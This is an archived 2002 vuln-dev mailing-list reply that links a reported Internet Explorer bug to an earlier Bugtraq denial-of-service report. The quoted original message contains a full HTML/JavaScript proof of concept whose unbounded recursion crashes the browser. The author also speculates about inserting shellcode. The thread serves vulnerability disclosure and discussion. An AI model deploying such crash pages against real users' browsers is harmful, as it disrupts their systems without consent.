RE: Buffer Overflow with all versions of Internet Explorer and Javascript.

From: Patrik Birgersson (floatat_private)
Date: Mon Jun 03 2002 - 14:17:33 PDT

  • Next message: Blue Boar: "Re: Buffer Overflow with all versions of Internet Explorer and Javascript."

    This seems quite similar to the "Multiple Vendor JavaScript Interpreter
    Denial Of Service Vulnerability" reported to Bugtraq in March.
    http://online.securityfocus.com/bid/4322
    
    
    Patrik Birgersson
    
    > -----Original Message-----
    > From: Matias Sedalo [mailto:s0t4ipv6at_private]
    > Sent: 2. juni 2002 23:08
    > To: vuln-devat_private
    > Subject: Buffer Overflow with all versions of Internet Explorer and
    > Javascript.
    >
    >
    > On 28/07/1999 I discovered a stack buffer overflow that is triggered, so far,
    > by all versions of Internet Explorer.
    > On many Windows 98 machines it makes it necessary to restart the computer,
    > since, as it seems to me, it runs out of memory.
    > It has only been tested on several 5.x versions of IE on Windows NT
    > Server SP6 and Windows 98 Second Edition. As I said before, on Windows 98
    > I had to force a restart.
    > Could it be possible to execute arbitrary code using the variable company of
    > the example?
    >
    > // Internet Explorer 5.00.2314.1003 on Windows NT 4 SP6
    > // Internet Explorer 5.00.3500.1003 on Windows 98 SE
    >
    > -----------cut here---------------------------
    > <html><head>
    > <script type="text/javascript">
    > // Call chain: hacerMail() -> soporte() -> close(hacerMail()) -> hacerMail() ...
    > // There is no base case, so the calls nest until the interpreter runs out of stack.
    > function hacerMail() {
    >   var company;                           // local, unused: soporte() reads the global set by crear()
    >
    >   crear();
    >   address="s0t4ipv6at_private";
    >   soporte();
    > }
    > function soporte(){
    >   var soporte="billat_private";
    >   window.location="mailto:"+address+"?cc="+soporte+"&subject="+company;
    > // window.location=company;             // this line also causes the bof.
    >   close(hacerMail());                    // hacerMail() is evaluated first: recursion with no exit
    > }
    > function crear(){
    >   company="shellcode here?\n";           // i don't think so.
    > }
    > </script>
    > </head><body>
    >   <input type="button" onClick="hacerMail();" value="SMASH!">
    > </body></html>
    > -----------cut here---------------------------
    >
    > Regards.
    >
    > - The Internet is harmful to your health -
    > - Law No. 127.0.0.1
    >
    > Matias Sedalo
    > http://www.shellcode.com.ar
    >
    > s0t4ipv6at_private
    > B7A1 B45E 4906 34BD 70A1 55F8 E5A0 BCA2
    > ........................................
    



    This archive was generated by hypermail 2b30 : Mon Jun 03 2002 - 14:33:56 PDT